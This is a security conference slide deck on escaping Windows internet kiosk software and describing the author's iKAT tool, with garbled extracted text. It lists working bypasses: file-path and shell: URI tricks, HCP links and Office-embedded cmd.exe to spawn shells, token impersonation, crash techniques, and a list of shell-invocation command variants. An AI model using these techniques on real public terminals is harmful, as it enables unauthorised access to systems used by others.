Hacking Internet Kiosk’s

Paul Craig
Principal Security Consultant
S
Security-Assessment.com
it A t
 Bio

ƒ Who am I?
ƒ Paul
P l Craig
C i
ƒ Principal Security Consultant.
Security-Assessment.com, Auckland, New Zealand

ƒ Published Security Author.

Author
ƒ Active Security Researcher.
ƒ Devoted Hacker.
Hacker

ƒ Comments, Feedback?
ƒ Email: paul@ha.cked.net
ƒ Website: http://ha.cked.net
p //
 Overview

ƒ Hacking Kiosks:
ƒ What is an Internet Kiosk.
Kiosk
ƒ Kiosk Software Security Model.

ƒ Vulnerabilities in Kiosk Software.

ƒ Vulnerabilities in the Kiosk Security Model.

“Hack any Windows Kiosk in less than 120 seconds!”

ƒ Tool Release.

ƒ Live Demo’s: Hacking (Two) Commercial Internet Kiosks.

ƒ More 0day than you can shake a stick at.
 What Is An Internet Kiosk
ƒ Last Year I Was Sitting in an Airport….
ƒ 8 hour stop-over in Hong Kong.
Kong
ƒ Queue of people waiting to use a hub of Internet Kiosks.

ƒ “Damn, those kiosks sure are popular…”

ƒ “I
“ wonder
d if I could
ld h
hack
k iit?.””

ƒ Kiosks are ppopular,

p , and rarelyy appear
pp in securityy publications.
p
ƒ Popularity + Poor Security Visibility = Good Attack Target

ƒ Personal Objective:
ƒ Find every possible method of hacking Internet Kiosk terminals.
ƒ Become the King of Internet Kiosk Hacking!
 What Is An Internet Kiosk

ƒ Kiosks are everywhere

ƒ Airports,
Airports Train stations,
stations Libraries
Libraries, DVD Rental Stores
Stores, Corporate
Building Lobbies, Convenience Stores, Post Office, Café’s,
Hospitals, Motels, Hotels, Universities.

ƒ Cheap technology has made Internet Kiosks very common.

 What Is An Internet Kiosk

ƒ Initial Observations of Kiosks

ƒ Hardware.
ƒ Kiosks
Ki k b built
ilt in
i tough
t h hard-shell
h d h ll cases.
ƒ Fibreglass, Steel, Thick MDF.
ƒ Lack of physical access to the underlying computer.
ƒ Input devices inaccessible (Floppy/DVD/USB/FireWire)
ƒ Kiosk bolted to the ground (padlocked).

ƒ General public are not trusted

trusted.
ƒ Kiosks are designed to prevent physical theft or malicious use.
 What Is An Internet Kiosk

ƒ Software.
ƒ Majority of Kiosks run commercial Windows Kiosk software
software.
ƒ Linux/BSD Kiosks exist, Windows more popular.

ƒ 44 commercial Windows Kiosk products in the market.

ƒ Marketed as : “Turn that old PC into instant revenue!”
ƒ Buy $59.99 Shareware -> Install -> Instant Kiosk!

ƒ Kioskk Software
f Essentially
ll Skins
k Windows:
d
ƒ Kiosk browsers based on standard Internet Explorer libraries.
ƒ WINHTTP.DLL/MSINET.OCX

ƒ Its Windows and Internet Explorer, highly customized.

 What Is An Internet Kiosk
ƒ “Kiosk Software Is The Best Attack Target.”
ƒ Hardware hacking is too obtrusive for public locations.
locations

ƒ “I Need to Walk up to Any Internet Kiosk and Pop Shell, Quickly.”

ƒ Explorer.exe, cmd.exe, command.com.
ƒ Time limited, 2 minutes or faster.

ƒ 16 Months of Kiosk Software Penetration Testing Later….

ƒ Virtualized
Vi t li d ten
t off th
the mostt popular
l Windows
Wi d Kiosk
Ki k platforms.
l tf
ƒ Researched methods of compromising each Kiosk.
ƒ Developed Kiosk Attack Methodology.

ƒ Startling Results: 100% success rate!

Kiosk Security Model
 Kiosk Securityy Model
ƒ Kiosk Software Implement Security in Two Approaches.

ƒ #1 - Reduce Available Host Functionality.

ƒ Disallow native OS functionality that can be used maliciously.
ƒ “Command Prompt has been Disabled”
ƒ “File Downloads Have Been Disabled”
ƒ Implemented through native ACL’s.

ƒ #2 – Graphically
G hi ll Jailed
J il d Into
I t a ‘Secure
‘S Kiosk
Ki k Browser’.
B ’
ƒ Kiosk users are stuck inside a Kiosk browser.
ƒ Kiosk browser ran in full screen, no ability to close, minimize.
ƒ Start Bar/Tray Menu removed or hidden.
ƒ Only thing you can do is browse the web.
 Kiosk Securityy Model

ƒ Example #1: Site Kiosk.

ƒ Looks similar to Windows
Windows.
ƒ Custom Tray Menu/Task Bar.
ƒ Only
O l one option,
ti ‘New
‘N Window’
Wi d ’
ƒ Real Windows ‘Start’ bar is hidden from view.
ƒ Trapped inside the Kiosk browser.
 Kiosk Securityy Model

ƒ Example #2: NetStop Kiosk

ƒ Custom task bar.
bar
ƒ Kiosk application ran as a full screen desktop.
ƒ No
N ability
bilit tto close
l th
the browser.
b
ƒ Only permits internet browsing.
 Kiosk Securityy Model

ƒ Kiosk Browsers Proactively Monitor Your Activity.

ƒ Kiosks contain multiple blacklists of prohibited activity.
ƒ Try to do something sneaky, the Kiosk will stop you.

ƒ Try to Browse C:\ with the Kiosk browser:

ƒ Blacklist in
in-focus
focus Modal Dialogs.
Dialogs
ƒ Block dialogs by Window Title or Window Class.
ƒ “Save
“S Fil
File A
As”,
” “O
“Open With”
With”, “Confirm
“C fi Fil
File D
Delete”,
l t ” “P
“Print”.
i t”
ƒ WM_CLOSE Window message sent to the blacklisted dialog.
ƒ Dialog closes.
 Kiosk Securityy Model
ƒ API Hooking.
ƒ Hook native OS API calls which can be used maliciously
maliciously.
ƒ KillProcess(), GetCommandLineW(), AllocConsole()
ƒ “Unauthorized
Unauthorized Functionality Detected
Detected, Process Killed”
Killed .

ƒ Kiosk Browser ran in ‘High Security Zone’

ƒ File downloads disabled.
ƒ Browser scripting, pop-ups, ActiveX, all disabled.

ƒ Watchdog Timer.
ƒ Every
E 5 minutes
i the
h Kiosk
Ki k will
ill enumerate allll active
i processes.
ƒ Terminate any unauthorized activity.

ƒ Custom Keyboard Driver.
ƒ Disable Windows shortcut key combinations.
ƒ Modifier Keys Unmapped
Unmapped.
Kiosk Securityy Model
combinations
CTRL-SHIFT-ESC (Task Mgr)
ALT-TAB (Switch Task)
CTRL-ALT-DELETE (Task Mgr)
CTRL-ESC (Start Menu)
Alt F4 (Close Application)
Alt-F4

ƒ CTRL, Tab, ALT, ‘Start’, Function, F1-F12.

ƒ Custom Keyboard with missing modifier keys!
ƒ Custom Mouse.
ƒ No
N right
i h click
li k button.
b

ƒ All Methods of reducing

g functionality!
y
 Hacking
Ki k Software
Kiosk S ft
 Hacking
g Kiosk Software

ƒ Kiosk Security Model is Based on Reducing Functionality.

ƒ Limit functionality which can be used to escape the Kiosk browser.

ƒ Exploiting A Kiosk Requires Invoking Functionality

Functionality.
ƒ Cause applications/functionality to spawn, popup on screen.
ƒ Use
U the
th invoked
i k d functionality
f ti lit to
t escape the
th Kiosk
Ki k jail.
j il
ƒ Spawn a command prompt, get back to Windows.

ƒ Kiosk Security Is Implemented Through Blacklists.

ƒ Blacklists (by nature) are never 100%.
ƒ We only need one method of escaping the software jail.
 Hacking
g Kiosk Software
ƒ Lets Say You Find a Kiosk in Your Local Mall.
ƒ ‘10RM
10RM for 1 hour of internet usage
usage’
ƒ Insert money.

ƒ You Find You are Trapped Inside a Kiosk Browser.

ƒ Only one visible button to ‘Start Browsing’
ƒ Start Browsing…
 Hacking
g Kiosk Software
ƒ Browse The Local File System Using The Kiosk Browser.
ƒ Local Windows users are capable of browsing the file-system
file system.
ƒ Kiosk software must explicitly block local browsing attempts.

ƒ Windows Is Designed For Idiots.

ƒ Caters for mistypes/fat-fingers.
yp / g
ƒ C:\windows\ maybe blocked.
File:/C:/windows File:/C:\windows\ File:/C:\windows/ File:/C:/windows
File://C:/windows File://C:\windows/ file://C:\windows C:/windows
C:\windows\ C:\windows C:/windows/ C:/windows\
%WINDIR% %TMP% %TEMP% %SYSTEMDRIVE%
%SYSTEMROOT% %APPDATA% %HOMEDRIVE% %HOMESHARE%

ƒ Blacklists
Bl kli t start
t t ffailing
ili about
b t now.
 Hacking
g Kiosk Software
ƒ Using Common Dialogs To Hack Kiosks.
ƒ Windows contains ‘Common
Common Dialogs’
Dialogs libraries.
libraries
ƒ Saving a file, opening a file, selecting font, choosing a colour.
ƒ COMDLG32.DLL
COMDLG32 DLL (Common Windows Dialogs Library).
Library)
ƒ COMDLG32.DLL Implements Common Windows Controls.
ƒ From COMCTL32.DLL (Common
( Windows
d Controls
l Library)
b )

ƒ File/Open, File/Save Dialog’s Contain ‘File View’ Controls.

ƒ File view control provides full Explorer functionality.
ƒ Same control that Windows Explorer uses.
ƒ File-Open Dialog = Explorer
ƒ Can be used to launch processes.
 Hacking
g Kiosk Software
ƒ Systematically Click Every Button, Graphic, Icon In The Kiosk
ƒ Can we invoke a File - Open Dialog? “Attach
Attach File
File”
ƒ Browse the file system
ƒ Right Click cmd.exe:
cmd exe: Open / Run As
ƒ Spawn cmd.exe
 Hacking
g Kiosk Software

ƒ Internet Explorer ‘Image Toolbar’.

ƒ Toolbar hovers top-left of a large image when clicked.
clicked
ƒ Each icon of this toolbar can invoke a Common Dialog.
ƒ File/Save.
Fil /S
ƒ File/Print.
ƒ File/Mailto.
ƒ Open “My Pictures” in Explorer.

ƒ Toolbar is present if the Kiosk uses Internet Explorer libraries.

ƒ Click a large image on screen

ƒ Spawn a Common Dialog, spawn Explorer.
 Hacking
g Kiosk Software

ƒ Using the Keyboard.

ƒ Keyboard shortcuts can be used to access the host OS
OS.
ƒ Check if a custom keyboard driver present?
ƒ Are
A modifier
difi keys
k enabled?
bl d?
ƒ Keyboard Combinations Which Produce Common Dialogs.
CTRL-B, CTRL-I (Favourites)
CTRL-H (History)
CTRL L CTL-0
CTRL-L, CTL 0 – (File/Open Dialog)
CTRL-P – (Print Dialog)
CTRL-S – ((Save As))
ƒ Kiosk Specific ‘Administrative’ shortcuts.
ƒ All Kiosk pproducts contain a hidden Administrative menu.
ƒ Mash the keyboard, CTRL-ALT-F8? CTRL-ESC-F9?
 Hacking
g Kiosk Software
ƒ Browser Security Zones
ƒ Browser security model incorporates multiple security zones:

Restricted Sites

Internet Zone

Intranet Zone

Trusted Sites

ƒ Each security zone adheres to a different security policy.

ƒ Internet zone has less ability to interact with a host.
host
ƒ Trusted Sites, Intranet Zone typically have more access.
 Hacking
g Kiosk Software
ƒ Local Users Can Access All Available Security Zones.
ƒ URL
URL’ss must be directly typed into the URL entry bar
bar.

ƒ Security Zone Escalation. about: pluggable-protocol handler.

ƒ About handler belongs to the ‘Trusted Sites’ security zone.
ƒ Suffers from a Cross Site Scripting vulnerability.
ƒ Local users can render arbitrary content within a trusted zone.

ƒ Spawn a File Open Common Dialog from a trusted security zone

zone.
about:<input%20type=file>
about:<a%20href=C:\windows\>Click-Here</a>
b %20h f C \ i d \ Cli k H /

ƒ Internet zone cannot follow links to the file system.

y
ƒ Trusted sites can.
 Hacking
g Kiosk Software
ƒ Shell Protocol Handler.
ƒ Shell handler provides access to Windows web folders
folders.

ƒ Type Into the URI Bar:

ƒ Shell:Profile
ƒ Shell:ProgramFiles
ƒ Shell:System
ƒ Shell:ControlPanelFolder
ƒ Shell:Windows

ƒ Each
E h URL will
ill spawn explorer.exe
l and
d browse
b the
h web
b folder.
f ld

ƒ Is the shell: handler blocked by the Kiosk?

 Hacking
g Kiosk Software

ƒ How About This:

ƒ shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}
shell:::{21EC2020 3AEA 1069 A2DD 08002B30309D}
ƒ Invoke the Windows Control Panel by ClassID.
ƒ Works
W k from
f common Internet
I t tEExplorer
l lib
libraries.
i
ƒ Bypass native ACL’s that may exist on control.exe
 Hacking
g Kiosk Software
ƒ The Downside to Physical Input Vectors.
ƒ Kiosk software is designed to not trust the guy on the keyboard
keyboard.
ƒ Kiosk User = Most Obvious Security Threat.
ƒ My research concluded that physical inputs are not so successful.
successful
ƒ 40-50% chance of popping shell.
ƒ Many
M techniques
t h i are already
l d published,
bli h d unoriginal.
i i l

ƒ A Subtle Discovery…
ƒ Remote websites not factored into the Kiosk security model.
ƒ Websites are trusted MORE than a local Kiosk user!

ƒ Kiosks rely on the default web browser security model.

model
 Hacking
g Kiosk Software

ƒ “I Need a Kiosk Hacking Website.”

ƒ An online tool you can visit from an Internet Kiosk terminal.
terminal
ƒ Provide all the content you will ever need to escape a Kiosk jail.

ƒ iKAT – Interactive Kiosk Attack Tool.

ƒ First of its kind! New method of hackingg Internet Kiosks!
ƒ Fast! iKAT can pop shell in less than 30 seconds.
ƒ 95
95-100%
100% success rate!

ƒ http://ikat.ha.cked.net
 Hacking
g Kiosk Software
ƒ What Can iKAT Do?
ƒ Kiosk Reconnaissance : Detect Installed Applications
ƒ JavaScript & res:// (resource) protocol handler.
ƒ Extract bitmap resources from PE executables
executables.
ƒ Verify bitmap presence and detect installed applications.

ƒ Detects all common commercial Kiosk platforms.

ƒ Enumerates locallyy installed applications.
pp
 Hacking
g Kiosk Software
ƒ Display Local Browser Variables.
ƒ Determine underlying Kiosk browser technology.
technology
ƒ MSINET.OCX, WINHTTP.DLL display Internet Explorer appVersion
ƒ Detect the presence of .NET
NET CLR
CLR.

ƒ Display Remote Server Variables

ƒ Discover remote IP address of the Kiosk terminal.
 Hacking
g Kiosk Software
ƒ All Common Browser Dialogs In One Place

ƒ File Open, Save As, Print, Print Preview:

ƒ Click down the list and determine what dialogs are blocked.
ƒ Use the File View control within the dialogs.
 Hacking
g Kiosk Software
ƒ Use Flash To Invoke Common Dialogs.
ƒ Adobe Flash is the most widely used browser plug
plug-in
in.
ƒ ActionScript 3 can invoke three unique File View dialogs.
ƒ ‘Select
Select File For Upload’
Upload
ƒ ‘Select File(s) For Upload’
ƒ ‘Select
‘S l t location
l ti for
f Download
D l d by
b ikat.ha.cked.net’
ik t h k d t’

ƒ Flash Common Dialogs have Unique Dialog Titles

ƒ Not standard “Choose File”
ƒ Bypass
ypa dialog
d a og Window
do title blacklists.
ba
ƒ Still contains the File View control.

ƒ Blacklists fail (again).

 Hacking
g Kiosk Software
ƒ Spawning Applications On The Kiosk.
ƒ Can we cause an application/process to spawn on the Kiosk.
Kiosk
ƒ Does the spawned application contains a common dialog?
ƒ Use the application to gain additional access to the Kiosk.
Kiosk

ƒ iKAT Invokes Default Windows URI Handlers.

ƒ URI handler applications are spawned for each URI.
ƒ Callto://,
//, Gopher://,
p //, HCP://,
//, Telnet://,
//, TN3270://,
//, Rlogin://,
g //,
LDAP://, News://, Mailto://
ƒ One Click Automation: One click spawns all default handlers.

ƒ 3rd party URI Handlers

ƒ MMS://,
MMS:// SKYPE://
SKYPE://, SIP://
SIP://, Play://
Play://, Steam://
Steam://, Quicktime://
 Hacking
g Kiosk Software
ƒ Example: HCP://: Help And Support Center
ƒ <a href
href=HCP://dummy>
HCP://dummy> Click
Click-me
me </a>
ƒ Search HCP for what you want to launch “Command Prompt”
ƒ “Using
Using Command Prompt
Prompt” provides link to spawn cmd.exe
cmd exe
ƒ Left Click Only!
 Hacking
g Kiosk Software
ƒ iKAT Provides Links to Over 100 URI Handlers.
ƒ Click,
Click click,
click click down the list.
list
ƒ Determine which handlers are covered by the Kiosk blacklist.
ƒ Use invoked handler application to escape the Kiosk.
Kiosk

ƒ iKAT Contains Local Security Zone Handlers

ƒ about:, res:, shell:
ƒ Lists of URL’s to type in.
ƒ Remembering ClassID’s is hard.
 Hacking
g Kiosk Software
ƒ Invoke Applications Using File Type Handlers.
ƒ Click on test.myfile,
test myfile Windows will spawn the ‘myfile’
myfile handler.
handler
ƒ iKAT uses DHTML/JavaScript to invoke 108 unique file handlers.

ƒ Internet Explorer supports prompt-less handler execution.

ƒ Example: Click test.wmv, Windows Media Player Spawns.
ƒ No Prompt “Are you sure you want to…”.

ƒ Kiosk blacklists monitor in focus dialogs for warning prompts.

 Hacking
g Kiosk Software

ƒ iKAT & Windows Media Files.

ƒ WMPlayer will silently launch for multiple file types.
types
ƒ Windows Media Playlist Files (.ASX)
ƒ Supports
S t ‘W
‘Web
bEEnhanced
h d Content’.
C t t’

ƒ Turn Windows Media Player

y into a web browser!
ƒ Provides a browser without any Kiosk security controls.
 Hacking
g Kiosk Software
ƒ iKAT & Office Documents.
ƒ If an Office file viewer is installed on the Kiosk,
Kiosk we win.
win
ƒ Embed a copy of cmd.exe within an office document.
ƒ Supported by .DOC,.DOCX,.XLS,.XLSB,.XLSM,XLSX
DOC DOCX XLS XLSB XLSM XLSX
ƒ ‘Open Package Contents’ dialog not detected by any Kiosk.

ƒ iKAT will spawn the most useful file possible.

 Hacking
g Kiosk Software
ƒ iKAT & Java Applets:
ƒ Signed Java applets can execute local processes.
processes
ƒ Detect if JRE is installed (iKAT Kiosk Reconnaissance).
ƒ Does the Kiosk detect the Java security warning prompt?
ƒ “Warning – Security”
ƒ 0% off tested
t t d Ki
Kiosks
k did.
did

ƒ iKAT Contains
o a Signed
g d Kiosk
o Specific
p Java
a a Applets.
pp
ƒ Signed applets to spawn command shells.
ƒ Includes Jython by GNUCITIZEN.
GNUCITIZEN
 Hacking
g Kiosk Software
ƒ Install a Malicious ActiveX
ƒ Safe for scripting ActiveX’s
ActiveX s can be used to compromise a Kiosk
Kiosk.
ƒ Unsafe method: object.execute(‘cmd.exe’);
ƒ Can we install a malicious ActiveX on the Kiosk?

ƒ iKAT ActiveX
ƒ Safe-for-scripting ActiveX which executes arbitrary executables.
ƒ Installingg an ActiveX requires
q administrative authority.
y
ƒ iKAT ActiveX gives you the ability to spawn a shell.

ƒ ActiveX is changing:
ƒ IE8 will not require admin rights for installing a new ActiveX.
ActiveX
 Hacking
g Kiosk Software
ƒ iKAT & ClickOnce Applications
ƒ ClickOnce is .NET
NET 2.0+
2 0+ technology (.NET
( NET CLR 2+ required)
ƒ ‘Online Application Deployment’ .application file handler.
ƒ Unsigned ClickOnce applications execute with full trust!
ƒ Admin privileges are not required!

ƒ Users are warned:

ƒ All tested Kiosks fail to detect this warning message!

ƒ Modern Kiosks now developed in .NET (CLR is present!)
 Hacking
g Kiosk Software
ƒ The most useful ClickOnce applications for Kiosk Hacking?

ƒ Embedded Web Browser.

ƒ HTTP browser with reduced security settings.

ƒ Application Executor.
ƒ Spawn arbitrary executables
executables.

ƒ Access Token Pincher.

ƒ Access token hijacking is a hip subject, why not!
ƒ Does the Kiosk user have the SeImpersonate privilege?
ƒ Impersonate available (privileged) tokens.
ƒ Spa
Spawn ccmd.exe
de eu under
de the
t e co
context
te t o
of tthe
epprivileged
eged to
token.
e
ƒ System shell, I win.
 Hacking
g Kiosk Software
ƒ Who Here Has Ever Crashed a Web Browser?
ƒ What about crashing a Kiosk: ‘Emo-Kiosking’
Emo-Kiosking
ƒ Create an unhandled exception in a Kiosk browser.
ƒ Kiosk browser crashes
crashes, We get the desktop
desktop, We Win!
ƒ Rare situation: Application crash = highly critical vulnerability.

ƒ iKAT Contains Common Browser Crash Techniques.

ƒ Published
P bli h d exploits
l it which
hi h results
lt in
i a crash.
h
ƒ Fastest, easiest method of escaping a Kiosk.
ƒ Fairly reliable, 40%-50% of tested Kiosks crash.

ƒ Kiosks crash, or reboot.

 Hacking
g Kiosk Software
ƒ Crashing Browser Plug-ins.
ƒ “Can
Can I create a .SWF
SWF file that can reliably crash a browser?”
browser?
ƒ Sequential byte file format fuzzing of the .SWF format.
ƒ Found multiple unhandled exception situations
situations.
ƒ Integer Divide By Zero.
ƒ Immediately
d l un-exploitable,
l bl reliably
l bl crash
h any browser.
b

ƒ Created ‘iKAT Auto Magic Flash Crasher’.

ƒ Is the Flash Plug

Plug-in
in Installed on The Kiosk?
ƒ iKAT can crash it, guaranteed, oh-day magic.
ƒ Adobe have resolved this issue in Flash Player 10 RC.
RC
 Downloading
g Tools
ƒ Lets Assume Something Worked.
ƒ You have access to the Kiosk File system
system.
ƒ Command shell spawned, Common Dialog, Java installed, etc

ƒ What Now?
ƒ Download additional tools/binaries.
tools/binaries

ƒ How Do You Download Files In a Tool-less Environment.

ƒ Kiosk terminal will not have a copy of wget.exe present.
ƒ Internet Explorer is likely uninstalled or disabled.
ƒ File downloads disabled.
 Downloading
g Tools
ƒ Old School: Downloading Files In Windows:
ƒ Using Common Dialogs
ƒ ‘Attach’ a remote file from a File-Open dialog.
ƒ FPSE/WebDAV to save the file locally
locally, and attach it
it.

ƒ Works
k From Any File->Open
l Dialog.
l
ƒ File saved in a writeable location.
ƒ Temporary internet files.
ƒ Downloads any file type/size.
 Downloading
g Tools
ƒ Use Flash To Download Files.
ƒ Most Kiosk’s
Kiosk s disable File Downloads with browser security policy
policy.
ƒ IE: Tools -> Internet Options -> Custom Level

ƒ Flash can be used to circumvent the browser policy.

ƒ Download method of the FileReference() object.
ƒ Flash does not validate browser security policy.

ƒ Very high success rate against Kiosks.

ƒ Another unpublished oh
oh-day
day trick.
trick
 Downloading
g Tools

ƒ Notepad Can Download and Upload Files.

ƒ File-> Open
ƒ http://test.com/trojan.txt
htt //t t /t j t t
ƒ Content must be 7bit safe.

ƒ File-> Save
ƒ Upload content to a remote site.
ƒ FPSE/WebDav
ƒ http://www.ok.com/blah.txt
http://www ok com/blah txt

ƒ Quickly upload files from a Kiosk.

Kiosk
 Downloading
g Tools

ƒ #1 Problem: Kiosk Hacking is a Tool less Environment

ƒ “iKAT
iKAT needs to provide tools for Kiosk hacking
hacking”.

ƒ Assorted Kiosk Hacking Tools:

ƒ Tools available as
ƒ .exe, .zip, Flash Download, 7bit Safe VBScript (.VBS/.VBE)!
 Downloading
g Tools
ƒ Command Shell Detours:
ƒ How many ways to spawn a command shell on Windows?
cmd.exe command.com win.com cmd.exe win.com command.com
Loadfix.com start.exe sc create testsvc binpath= loadfix.com cmd.exe loadfix.com command.com
"cmd
cmd /K start
start" type
type= own
type= interact
start loadfix.com cmd.exe start loadfix.com start loadfix.com %COMSPEC%
command.com cmd.exe

ƒ Win.com? Loadfix.com? Start? Combinations of both?

ƒ Kiosk ACL’s typically
yp y block cmd.exe from spawning.
p g
ƒ What about command.com, win.com?

ƒ CMD Detours attempts 17 methods of invoking a shell.

ƒ Flawless at bypassing Kiosk ACL’s.
 iKAT Reloaded

ƒ Officially Released at Defcon 16 Las Vegas.

ƒ Amazing success!
ƒ iKAT can pop shell on ANY Vegas Kiosk < 10 seconds

ƒ Who’s Been Using iKAT?

ƒ 14,000+
14 000+ unique hits,
hits 10-15%
10 15% of requests from Kiosks!
ƒ reception.sitekiosk.com, comm775-kiosknet-dhcp8.bu.edu & comm685-kiosknet-dhcp74.bu.edu
ƒ 12-46-54-181.seatac.seattwa.wayport.net, Aoc.ppx-bc2.hqda-aoc.army.pentagon.mil
ƒ Digger2.defence.gov.au,
Digger2 defence gov au Radisson-hotel-19.lax.customer.centurytel.net
Radisson-hotel-19 lax customer centurytel net
ƒ Security-lab1.juniper.net, Lan-116.181.coresecurity.com
ƒ Ustdc1.deloitte.com, Deloitteservices.deloitte.nl, Dh212.public.mod.uk

ƒ iKAT Portable Now Available!

ƒ Entire iKAT website in a zipp file
ƒ Useful for offsite penetration testers.
 Pwnage!
g

Hacking
g Kiosks : The Demo’s
ƒ Two virtualized (commercial) Kiosk products.
ƒ Recommended Kiosk application configuration.
ƒ Default Windows XP install.

ƒ Using iKAT To Pop a Command shell

ƒ As Fast As Possible!
 Conclusion

Questions?
Email me:

paul@ha.cked.net
paul.craig@security-assessment.com